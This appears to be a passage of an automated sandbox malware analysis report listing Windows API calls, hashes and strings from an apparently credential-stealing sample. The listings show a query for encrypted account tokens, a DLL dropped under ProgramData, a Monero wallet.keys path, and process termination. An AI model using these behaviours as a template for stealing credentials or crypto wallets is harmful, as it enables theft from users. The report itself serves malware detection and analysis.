                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 8b395c854ddfd5e4dbdcc33a41225ca1b12b47610224f219ae42bdec4a7f0357
                                        • Instruction ID: 8cc5c6e92b9177407f415b557039d455fe382619ad6896b8fcb96906e015d8a8
                                        • Opcode Fuzzy Hash: 8b395c854ddfd5e4dbdcc33a41225ca1b12b47610224f219ae42bdec4a7f0357
                                        • Instruction Fuzzy Hash: 2BB164729101189BCF14FBA0EDA6EEE77B9AF54300F4855B8F50677091EF346A48CB62
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: dc8a1204710bba88a4bec6eacfeeddb3f630d1a975247bef181c2afbe3658851
                                        • Instruction ID: 41986f05c5ec2ed48afa181a384c9fadf2bac23b8795704514b1d79b8e14da09
                                        • Opcode Fuzzy Hash: dc8a1204710bba88a4bec6eacfeeddb3f630d1a975247bef181c2afbe3658851
                                        • Instruction Fuzzy Hash: 1EF08270A48309EFD3689FE6E40975CBBB1EF04B07F1142D9F649AE184D67A8A40DB91
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E29850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00E208DC,C:\ProgramData\chrome.dll), ref: 00E29871
                                          • Part of subcall function 00E1A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E1A098
                                        • StrCmpCA.SHLWAPI(00000000,01A88BD8), ref: 00E20922
                                        • StrCmpCA.SHLWAPI(00000000,01A88B98), ref: 00E20B79
                                        • StrCmpCA.SHLWAPI(00000000,01A88A48), ref: 00E20A0C
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                        • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E20C35
                                        Strings
                                        • C:\ProgramData\chrome.dll, xrefs: 00E20C30
                                        • C:\ProgramData\chrome.dll, xrefs: 00E208CD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                        • API String ID: 585553867-663540502
                                        • Opcode ID: f7ad21a06effe724034e757aeb55710571a2632e43c77b86fb76149eef51d273
                                        • Instruction ID: 9cdb54074340fa3e03ba5a10e83b456264f9966852414128c17f8f48b70e77ad
                                        • Opcode Fuzzy Hash: f7ad21a06effe724034e757aeb55710571a2632e43c77b86fb76149eef51d273
                                        • Instruction Fuzzy Hash: D9A178717002089FCB28EF64D996EED77B6FF94300F54956DE40A6F282DA30DA05CB92
                                        APIs
                                          • Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,01A8E550,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16
                                        • wsprintfA.USER32 ref: 00E19E7F
                                        • lstrcat.KERNEL32(00000000,?), ref: 00E19F03
                                        • lstrcat.KERNEL32(00000000,?), ref: 00E19F17
                                        • lstrcat.KERNEL32(00000000,00E312D8), ref: 00E19F29
                                        • lstrcpy.KERNEL32(?,00000000), ref: 00E19F7C
                                        • Sleep.KERNEL32(00001388), ref: 00E1A013
                                          • Part of subcall function 00E299A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E299C5
                                          • Part of subcall function 00E299A0: Process32First.KERNEL32(00E1A056,00000128), ref: 00E299D9
                                          • Part of subcall function 00E299A0: Process32Next.KERNEL32(00E1A056,00000128), ref: 00E299F2
                                          • Part of subcall function 00E299A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E29A4E
                                          • Part of subcall function 00E299A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00E29A6C
                                          • Part of subcall function 00E299A0: CloseHandle.KERNEL32(00000000), ref: 00E29A79
                                          • Part of subcall function 00E299A0: CloseHandle.KERNEL32(00E1A056), ref: 00E29A88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                        • String ID: D
                                        • API String ID: 531068710-2746444292
                                        • Opcode ID: 3e3faabf22b1c210ff8b316809ec1266e77d855ec4a70c2bbe2a33b819d13928
                                        • Instruction ID: 2aa9f0b594b8aea0a1d05a7a79a3d86b2a421d0210de0dc1f6b32e39bac5d234
                                        • Opcode Fuzzy Hash: 3e3faabf22b1c210ff8b316809ec1266e77d855ec4a70c2bbe2a33b819d13928
                                        • Instruction Fuzzy Hash: 4751B3B1944318ABEB24DB60DC4AFDA77B8AB44704F044198F60DAB2C1EB75AB84CF51
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 00E8FA1F
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00E8FA27
                                        • _ValidateLocalCookies.LIBCMT ref: 00E8FAB0
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00E8FADB
                                        • _ValidateLocalCookies.LIBCMT ref: 00E8FB30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction ID: 3faec2afec08ec159764400bdc476d7a67b32e84aa91ff90d55b18ec48304992
                                        • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction Fuzzy Hash: 70419531A00119EFCF14EF68C884A9D7BF5BF45324F1491A5E81CBB352D7319905CB91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E1501A
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E15021
                                        • InternetOpenA.WININET(00E30DE3,00000000,00000000,00000000,00000000), ref: 00E1503A
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E15061
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E15091
                                        • InternetCloseHandle.WININET(?), ref: 00E15109
                                        • InternetCloseHandle.WININET(?), ref: 00E15116
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: 966f158988b55b3f089d618d4f0b93eab698c488e31eda31856576f782b3786a
                                        • Instruction ID: 31c924e31ffedf81d994785d5c10cde3b71553b6386964c3441614754974a4d9
                                        • Opcode Fuzzy Hash: 966f158988b55b3f089d618d4f0b93eab698c488e31eda31856576f782b3786a
                                        • Instruction Fuzzy Hash: 523105B5A40218EBDB24CF94DC85BDDB7B5AB48704F1081D8FA09B7281C7756EC58F98
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E285B6
                                        • wsprintfA.USER32 ref: 00E285E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E2860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E2861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E28629
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                        • RegQueryValueExA.ADVAPI32(00000000,01A8EBC0,00000000,000F003F,?,00000400), ref: 00E2867C
                                        • lstrlen.KERNEL32(?), ref: 00E28691
                                        • RegQueryValueExA.ADVAPI32(00000000,01A8EDD0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E30B3C), ref: 00E28729
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E28798
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E287AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: b5ba04e7fea3352875499f12596404c3b685652bad992298427d28d32a5fab1c
                                        • Instruction ID: 4533d1112960dc0393dfb2759d3831de9174b72d039bbc80480c9f7a45d01832
                                        • Opcode Fuzzy Hash: b5ba04e7fea3352875499f12596404c3b685652bad992298427d28d32a5fab1c
                                        • Instruction Fuzzy Hash: F8214C71A0122CABDB24DB54DC85FE9B3B8FB48704F0081D9F249A6180DF75AA85CFD4
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E299C5
                                        • Process32First.KERNEL32(00E1A056,00000128), ref: 00E299D9
                                        • Process32Next.KERNEL32(00E1A056,00000128), ref: 00E299F2
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E29A4E
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E29A6C
                                        • CloseHandle.KERNEL32(00000000), ref: 00E29A79
                                        • CloseHandle.KERNEL32(00E1A056), ref: 00E29A88
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: e1f7c7c229fa835fdda28a318da8a8cee48d5055c0594dbb69b48ee96217ffc8
                                        • Instruction ID: 052b344ce212fa61e996e40ea48d95a0f8f04cbaf130e9eda27523d195ee89c9
                                        • Opcode Fuzzy Hash: e1f7c7c229fa835fdda28a318da8a8cee48d5055c0594dbb69b48ee96217ffc8
                                        • Instruction Fuzzy Hash: 7921FFB1900318EBDB35DF66E888BDDB7B5BB48704F1051C8E509AA284D7799E84CF90
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27834
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E2783B
                                        • RegOpenKeyExA.ADVAPI32(80000002,01A7BB78,00000000,00020119,00000000), ref: 00E2786D
                                        • RegQueryValueExA.ADVAPI32(00000000,01A8EDB8,00000000,00000000,?,000000FF), ref: 00E2788E
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E27898
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: 6bbfdac815c98a84553f7411b22e5193b4e0e7a6d21bd6d917ca3870052abdfd
                                        • Instruction ID: faacbc89e7c15e6979b50c281e576c8f1d6da9092033e00dfaf2741eb9895fcd
                                        • Opcode Fuzzy Hash: 6bbfdac815c98a84553f7411b22e5193b4e0e7a6d21bd6d917ca3870052abdfd
                                        • Instruction Fuzzy Hash: 52016775E44315FBE714DBD5ED49F6D77B8EB44B00F004098FA84AB284D7759940CB90
                                        APIs
                                        • CreateFileA.KERNEL32(>=,80000000,00000003,00000000,00000003,00000080,00000000,?,00E23D3E,?), ref: 00E2948C
                                        • GetFileSizeEx.KERNEL32(000000FF,>=), ref: 00E294A9
                                        • CloseHandle.KERNEL32(000000FF), ref: 00E294B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
